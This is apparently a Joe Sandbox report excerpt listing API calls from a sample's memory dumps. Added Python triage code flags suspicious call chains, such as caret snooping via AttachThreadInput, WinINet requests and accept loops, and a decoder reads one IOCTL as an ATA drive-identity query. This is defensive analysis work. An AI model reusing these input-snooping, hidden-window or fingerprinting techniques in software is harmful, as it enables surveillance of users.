                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 03bceaacb69e4006e22e7c0c7fcdb16f9e3179648fbb783cc75da1f99e3c0d77
                                        • Instruction ID: a437c1567ac1c1162512cf97aa53ce41337d2839f3609a7fe0a35481f3dddd26
                                        • Opcode Fuzzy Hash: 03bceaacb69e4006e22e7c0c7fcdb16f9e3179648fbb783cc75da1f99e3c0d77
                                        • Instruction Fuzzy Hash: 2C31F076D00108AFDB01EFB5D8859EFBBFDEF59314B11806AF815E7211DA359E058BA0
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003749B7
                                          • Part of subcall function 00374A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00374A60
                                          • Part of subcall function 00374A41: InternetCloseHandle.WININET(00000000), ref: 00374AFD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Internet$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 1463438336-0
                                        • Opcode ID: 371bcc47948a99a514ec9cb860760d224c6651ca9f23c8ec29d74b415d9af8a0
                                        • Instruction ID: 3e64c81ca875638d6180153be63c961e0391d7ae266fe82ae4845ec4729de49e
                                        • Opcode Fuzzy Hash: 371bcc47948a99a514ec9cb860760d224c6651ca9f23c8ec29d74b415d9af8a0
                                        • Instruction Fuzzy Hash: 3E21A731240605BFDB279F608C00F7BB7ADFB89711F14801AFA0A96550EB75E4119754
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 003888A3
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003888BD
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003888CB
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003888D9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: cd4ed5f5e6ded06a8a05720f4e2652e2722abb96b822fbb52c41a36cbe517688
                                        • Instruction ID: 8703a30221f7709f333c7c5e9866b74023325d2e68d7b6747dd37e2a156f3226
                                        • Opcode Fuzzy Hash: cd4ed5f5e6ded06a8a05720f4e2652e2722abb96b822fbb52c41a36cbe517688
                                        • Instruction Fuzzy Hash: 33117F31205614AFDB16AB28DC05FAA7BADAF96320F544159F816CB2A1CB60AC008790
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0037906D
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0037907F
                                        • accept.WS2_32(00000000,00000000,00000000), ref: 0037908C
                                        • WSAGetLastError.WS2_32(00000000), ref: 003790A3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastacceptselect
                                        • String ID:
                                        • API String ID: 385091864-0
                                        • Opcode ID: fd7eb77d7725c815c0fa11df1b0cf99a375a2f1cd93497679413edfc7d0d2387
                                        • Instruction ID: 48fc98b6632645ce978899eb8ce2df71337f4fcedfa8e8b6cfa3d173b333dc10
                                        • Opcode Fuzzy Hash: fd7eb77d7725c815c0fa11df1b0cf99a375a2f1cd93497679413edfc7d0d2387
                                        • Instruction Fuzzy Hash: C8215472A001249FC715DF69D885A9EBBFCEF4A710F00816AF84AD7290DA74DA45CB90
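The four entries above (the GetForegroundWindow / AttachThreadInput / GetCaretPos chain, the InternetConnectW / InternetOpenUrlW chain, the SetLayeredWindowAttributes call and the select / accept loop) are API sequences a triage script can match automatically instead of being read entry by entry. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses entries in the layout shown on this page (an "APIs" header, bullet lines ending in "ref: <address>", callee APIs marked "Part of subcall function", and an "Opcode ID" line later in the same entry) and flags those chains. The sample text is a reduced copy of the four entries above; the chain rules and their wording are my own triage choices, not the report's signatures.

```python
"""Parse Joe Sandbox 'APIs' entries and flag API chains worth a closer look."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Matches "• GetCaretPos.USER32(?), ref: 00387AC7" and the indented callee form
# "• Part of subcall function 003669C9: AttachThreadInput.USER32(...), ref: 003669F1".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None  # callee address when listed as "Part of subcall function"


@dataclass
class FunctionEntry:
    opcode_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)


def parse_report(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' header; the Opcode ID that follows names the entry."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is not None and (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif cur is not None and (m := OPCODE_LINE.match(line)):
            cur.opcode_id = m["id"]
    return entries


def _imm(operand: str) -> Optional[int]:
    """Hex operand as rendered by the report, or None where the sandbox shows '?'."""
    try:
        return int(operand, 16)
    except ValueError:
        return None


# A rule fires when every API in its set occurs in one function (callee APIs included
# unless include_subcalls=False). The sets mirror the entries on this page.
CHAIN_RULES = [
    ("caret position of a foreign window via AttachThreadInput + GetCaretPos",
     {"GetForegroundWindow", "AttachThreadInput", "GetCaretPos"}),
    ("WinINet request via InternetConnectW + InternetOpenUrlW",
     {"InternetConnectW", "InternetOpenUrlW"}),
    ("inbound connections handled via select + accept",
     {"select", "accept"}),
]
LWA_ALPHA = 0x2  # SetLayeredWindowAttributes dwFlags bit: apply bAlpha (winuser.h)


def find_chains(entries: List[FunctionEntry], include_subcalls: bool = True) -> List[tuple]:
    findings = []
    for e in entries:
        names = {c.api for c in e.calls if include_subcalls or c.subcall is None}
        for desc, needed in CHAIN_RULES:
            if needed <= names:
                findings.append((e.opcode_id[:12], desc))
        for c in e.calls:  # argument-aware rule: window transparency requested
            flags = _imm(c.args[3]) if c.api == "SetLayeredWindowAttributes" and len(c.args) == 4 else None
            if flags is not None and flags & LWA_ALPHA:
                findings.append((e.opcode_id[:12],
                                 f"SetLayeredWindowAttributes with LWA_ALPHA; bAlpha operand {c.args[2]!r} unresolved"))
    return findings


# Constructed input: the four entries above, reduced to the lines the parser reads.
SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00387AB6
  • Part of subcall function 003669C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 003669E3
  • Part of subcall function 003669C9: GetCurrentThreadId.KERNEL32 ref: 003669EA
  • Part of subcall function 003669C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003669F1
• GetCaretPos.USER32(?), ref: 00387AC7
• ClientToScreen.USER32(00000000,?), ref: 00387B00
Memory Dump Source
• Opcode ID: 03bceaacb69e4006e22e7c0c7fcdb16f9e3179648fbb783cc75da1f99e3c0d77
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003749B7
  • Part of subcall function 00374A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00374A60
• Opcode ID: 371bcc47948a99a514ec9cb860760d224c6651ca9f23c8ec29d74b415d9af8a0
APIs
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 003888BD
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003888D9
• Opcode ID: cd4ed5f5e6ded06a8a05720f4e2652e2722abb96b822fbb52c41a36cbe517688
APIs
• select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0037906D
• accept.WS2_32(00000000,00000000,00000000), ref: 0037908C
• Opcode ID: fd7eb77d7725c815c0fa11df1b0cf99a375a2f1cd93497679413edfc7d0d2387
"""

if __name__ == "__main__":
    for opcode_prefix, desc in find_chains(parse_report(SAMPLE)):
        print(opcode_prefix, desc)
```

Two reading notes on the entries this matches. AttachThreadInput is what lets GetCaretPos return the caret of a window owned by another thread; on its own GetCaretPos only reports the calling thread's caret, so the AttachThreadInput in the subcall is the part that makes the chain interesting, and the rule counts callee APIs for that reason (pass include_subcalls=False to see how many matches depend on them). The 000000EC index passed to GetWindowLongW/SetWindowLongW is, read as a sign-extended 8-bit immediate, -20, which is GWL_EXSTYLE, the index whose WS_EX_LAYERED bit SetLayeredWindowAttributes requires; my reading is that the report prints the raw imm8 of a push -20, since 0xEC is not a valid GetWindowLong index on its own. The bAlpha operand of SetLayeredWindowAttributes is shown as ? in the report, so whether the window is made fully invisible cannot be concluded from this entry.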
                                        APIs
                                          • Part of subcall function 00362CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003618FD,?,?,?,003626BC,00000000,000000EF,00000119,?,?), ref: 00362CB9
                                          • Part of subcall function 00362CAA: lstrcpyW.KERNEL32(00000000,?,?,003618FD,?,?,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00362CDF
                                          • Part of subcall function 00362CAA: lstrcmpiW.KERNEL32(00000000,?,003618FD,?,?,?,003626BC,00000000,000000EF,00000119,?,?), ref: 00362D10
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00361916
                                        • lstrcpyW.KERNEL32(00000000,?,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 0036193C
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00361970
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 7d3cdb0c091ce71df2115c6b8051011aefd59dab8d023bc324eb94509f77e840
                                        • Instruction ID: 96810cdeeb46f4c9acc35be983ab7dc1369ddc90eb0a44a580e152dd8c24594e
                                        • Opcode Fuzzy Hash: 7d3cdb0c091ce71df2115c6b8051011aefd59dab8d023bc324eb94509f77e840
                                        • Instruction Fuzzy Hash: AC11DD3A200301AFDB16AF34D855D7A77F8FF85350B45C42AF806CB2A8EB71A85187E1
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0036715C
                                        • _memset.LIBCMT ref: 0036717D
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003671CF
                                        • CloseHandle.KERNEL32(00000000), ref: 003671D8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: 5a347bd39b790398cdacb720c3e9d9aac701d21e8d49435398e3618d04eef410
                                        • Instruction ID: c6adcb6f6cc24303d0310759a0118eeceb7596dd96954a227a04d2b0a7f7b66f
                                        • Opcode Fuzzy Hash: 5a347bd39b790398cdacb720c3e9d9aac701d21e8d49435398e3618d04eef410
                                        • Instruction Fuzzy Hash: 60110A729012287AD7315BA5AC4DFEBBABCEF46764F10419AF505E71D0D2704E808BA4
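The entry above opens a handle with CreateFileW(dwDesiredAccess=C0000000, dwShareMode=00000003, dwCreationDisposition=00000003, dwFlagsAndAttributes=00000080), zeroes a buffer, and issues DeviceIoControl with control code 0004D02C and 512-byte (00000200) input and output buffers. Splitting the control code by the CTL_CODE layout (device type, access, function, method) gives FILE_DEVICE_CONTROLLER, FILE_READ_ACCESS | FILE_WRITE_ACCESS, function 0x40B, METHOD_BUFFERED, which is IOCTL_ATA_PASS_THROUGH, the user-mode path for sending an ATA command such as IDENTIFY DEVICE (whose 512-byte response carries the drive model and serial number) to a physical drive. The report shows only the code and buffer sizes; reading the call as a drive-identity query used for host fingerprinting is my inference, not something the page states. The Python below is an added example, not part of the report: the constants are the Windows SDK definitions (winioctl.h, ntddscsi.h, ntddstor.h, ntdddisk.h), and the decoding functions are my own.

```python
"""Decode a DeviceIoControl control code (CTL_CODE layout) and CreateFileW flag operands."""

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method      (winioctl.h)
def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> dict:
    """Split a control code into its four CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS"}
DEVICE_TYPES = {
    0x04: "FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE)",
    0x07: "FILE_DEVICE_DISK",
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}

# Storage IOCTLs commonly used to read drive identity, as defined in the SDK headers.
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x0402, 0, 3): "IOCTL_SCSI_MINIPORT",
    ctl_code(0x04, 0x0405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


def describe_ioctl(code: int) -> dict:
    """Human-readable view of a control code; 'name' is None when not in KNOWN_IOCTLS."""
    f = decode_ioctl(code)
    return {
        "code": f"0x{code:08X}",
        "device_type": DEVICE_TYPES.get(f["device_type"], f"0x{f['device_type']:X}"),
        "function": f"0x{f['function']:03X}",
        "method": METHOD[f["method"]],
        "access": ACCESS[f["access"]],
        "name": KNOWN_IOCTLS.get(code),
    }


# Bit-flag decomposition for the CreateFileW operands in the same entry.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}


def decode_flags(value: int, table: dict) -> tuple:
    """Return (names of the flags set in value, bits not covered by the table)."""
    names, leftover = [], value
    for bit, name in sorted(table.items()):
        if value & bit == bit:
            names.append(name)
            leftover &= ~bit
    return names, leftover


if __name__ == "__main__":
    # Operands as listed in the report entry above.
    print(describe_ioctl(0x0004D02C))
    print(decode_flags(0xC0000000, GENERIC_ACCESS), decode_flags(0x3, SHARE_MODE))
```

The share mode 00000003 decodes to FILE_SHARE_READ | FILE_SHARE_WRITE and the disposition 00000003 is OPEN_EXISTING, which is the combination needed to open an existing device object rather than a file; the path operand itself is unresolved (?) in the report, so which device is opened is not visible from this entry.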
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003613EE
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00361409
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0036141F
                                        • FreeLibrary.KERNEL32(?), ref: 00361474
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                        • String ID:
                                        • API String ID: 3137044355-0
                                        • Opcode ID: 4c1e4604c6aa77371734b16151a1cb2b9a63afdba0648e2904be706455893018
                                        • Instruction ID: 1994f42fdcce546115b8a6328e76c7c36c6fe7de919ee5c3ed5201e62c0d3b5b
                                        • Opcode Fuzzy Hash: 4c1e4604c6aa77371734b16151a1cb2b9a63afdba0648e2904be706455893018
                                        • Instruction Fuzzy Hash: A721AC75A00209ABDB239F92DC88ADABBBCEF00700F04C569A5129B554DBB4EA04CF90
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0035C285
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0035C297
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0035C2AD
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0035C2C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: cf9fc60cb2df284adfb9ab36619fffbdee2b5ac10cfac83f51353ef3b29a3bac
                                        • Instruction ID: 9e3fe90e4f139c82c011e7ce16751b28261487bcfb338eddaed69396a9a6b5ee
                                        • Opcode Fuzzy Hash: cf9fc60cb2df284adfb9ab36619fffbdee2b5ac10cfac83f51353ef3b29a3bac
                                        • Instruction Fuzzy Hash: 1E11487A900218FFDF11DFD8C880E9DBBB8FB08714F214091EA00B7290D671AE10DB94
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00367C6C
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00367C9F
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00367CB5
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00367CBC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 3d696d5a9808ac3ee81a5c2c9a1c3f1c16556c66122bff5d6922d7d30a753e77
                                        • Instruction ID: 4000f1f3a986537910125a3f734530453e83af68bded46f8146537d7c6f91aa9
                                        • Opcode Fuzzy Hash: 3d696d5a9808ac3ee81a5c2c9a1c3f1c16556c66122bff5d6922d7d30a753e77
                                        • Instruction Fuzzy Hash: 8A110472A04244BFC7139BA89C48AAA7FAD9B05324F558355F825D72D1D67089048BA0
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 003649EE
                                        • Sleep.KERNEL32(00000000), ref: 00364A13
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00364A1D
                                        • Sleep.KERNEL32(?), ref: 00364A50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 7aef42b8851a8cf68717dcbef9586971f725b9bedd2c9c0a380b83a158f4f626
                                        • Instruction ID: 5501d145e7d5c9ca68ef14e920d5fa98e97336e96e771bf6208ecc87431c9d9e
                                        • Opcode Fuzzy Hash: 7aef42b8851a8cf68717dcbef9586971f725b9bedd2c9c0a380b83a158f4f626
                                        • Instruction Fuzzy Hash: C9113C31D40518EBCF06EFE5E989AEEBF78FF0A711F018055E942B6254CB309550CBA9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
